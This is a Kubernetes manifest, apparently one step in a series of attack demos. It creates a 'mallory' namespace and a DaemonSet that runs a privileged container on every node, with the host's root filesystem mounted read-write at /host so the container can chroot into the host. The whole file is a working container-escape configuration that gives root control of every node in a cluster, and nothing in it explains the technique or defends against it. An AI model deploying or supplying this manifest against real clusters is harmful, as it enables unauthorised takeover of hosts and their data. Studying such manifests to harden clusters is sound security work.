08-priv-daemonset-chroot.yaml
apiVersion: v1
kind: Namespace
metadata:
  name: mallory  
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: mallory
  namespace: mallory
  labels:
    k8s-app: mallory
spec:
  selector:
    matchLabels:
      name: mallory
  template:
    metadata:
      labels:
        name: mallory
    spec:
      # hostPID: true
      # hostIPC: true
      # hostNetwork: true
      containers:
      - name: mallory
        image: debian:buster-slim
        command: ["sleep"]
        args: [ "10000"]
        stdin: true
        tty: true
        volumeMounts:
        - name: host
          mountPath: /host
          readOnly: false
        securityContext:
          privileged: true
      volumes:
      - name: host
        hostPath:
          path: /
